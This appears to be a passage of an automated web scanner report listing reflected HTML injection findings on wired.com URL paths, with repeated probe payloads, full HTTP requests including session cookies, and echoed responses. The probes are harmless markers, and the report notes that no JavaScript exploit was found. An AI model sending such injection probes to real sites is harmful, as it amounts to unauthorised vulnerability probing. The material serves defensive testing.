<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars215d7"><a>d31fce4364 ss_coolwheels"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a5e"><a>3d542f5f695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/coolwheelsf0a5e"><a>3d542f5f695 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29323 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_coolwheelsf0a5e"><a>3d542f5f695"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d8b"><a>cd4df970211 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars93d8b"><a>cd4df970211/energy HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29315 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:53 GMT Date: Sun, 21 Nov 2010 23:05:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars93d8b"><a>cd4df970211 ss_energy"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3cd"><a>1fe87d440bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/energy1a3cd"><a>1fe87d440bf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29315 Vary: Accept-Encoding Cache-Control: max-age=554 Expires: Sun, 21 Nov 2010 23:15:34 GMT Date: Sun, 21 Nov 2010 23:06:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_energy1a3cd"><a>1fe87d440bf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a14"><a>265d8487a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /carse5a14"><a>265d8487a92/futuretransport HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29333 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:58 GMT Date: Sun, 21 Nov 2010 23:05:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_carse5a14"><a>265d8487a92 ss_futuretransport"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c73"><a>e09bc35649e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars/futuretransport36c73"><a>e09bc35649e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29333 Vary: Accept-Encoding Cache-Control: max-age=583 Expires: Sun, 21 Nov 2010 23:16:08 GMT Date: Sun, 21 Nov 2010 23:06:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cars ss_futuretransport36c73"><a>e09bc35649e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8402"><a>edd50cf471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee8402"><a>edd50cf471 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29238 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:14 GMT Date: Mon, 22 Nov 2010 01:11:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee8402"><a>edd50cf471"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53de"><a>40592780ce4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturee53de"><a>40592780ce4/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29241 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:15:44 GMT Date: Sun, 21 Nov 2010 20:11:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturee53de"><a>40592780ce4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbf8"><a>ab6cb8357ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture8dbf8"><a>ab6cb8357ba/art HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29251 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:09:58 GMT Date: Sun, 21 Nov 2010 23:05:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture8dbf8"><a>ab6cb8357ba ss_art"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d542"><a>e8d21a02e71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art4d542"><a>e8d21a02e71 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29251 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:24 GMT Date: Sun, 21 Nov 2010 23:06:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art4d542"><a>e8d21a02e71"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86153"><a>a16e375242b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture86153"><a>a16e375242b/art/magazine/15-11/pl_arts HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture86153"><a>a16e375242b ss_art c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d77"><a>f26f00f82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art44d77"><a>f26f00f82f/magazine/15-11/pl_arts HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29283 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:41 GMT Date: Sun, 21 Nov 2010 23:06:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art44d77"><a>f26f00f82f c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1d9"><a>1df8fb955e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/magazine8e1d9"><a>1df8fb955e1/15-11/pl_arts HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=556 Expires: Sun, 21 Nov 2010 23:16:11 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_magazine8e1d9"><a>1df8fb955e1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26ce"><a>beebd8a9cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturec26ce"><a>beebd8a9cd7/art/magazine/16-09/ff_xray HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:10:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturec26ce"><a>beebd8a9cd7 ss_art c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a6e"><a>642ea85b965 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artc4a6e"><a>642ea85b965/magazine/16-09/ff_xray HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=581 Expires: Sun, 21 Nov 2010 23:16:23 GMT Date: Sun, 21 Nov 2010 23:06:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artc4a6e"><a>642ea85b965 c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a844"><a>403dadf803e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/magazine2a844"><a>403dadf803e/16-09/ff_xray HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29285 Vary: Accept-Encoding Cache-Control: max-age=546 Expires: Sun, 21 Nov 2010 23:16:05 GMT Date: Sun, 21 Nov 2010 23:06:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_magazine2a844"><a>403dadf803e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fa5"><a>049ef037e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture72fa5"><a>049ef037e84/art/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture72fa5"><a>049ef037e84 ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f72b"><a>f7633aef4b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art3f72b"><a>f7633aef4b8/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:09 GMT Date: Sun, 21 Nov 2010 23:07:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art3f72b"><a>f7633aef4b8 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851a2"><a>7554777a3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia851a2"><a>7554777a3ab/2008/05/gallery_faves_transportation_photos HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:23 GMT Date: Sun, 21 Nov 2010 23:07:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia851a2"><a>7554777a3ab"> ...[SNIP]...
1.54. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]previousnext
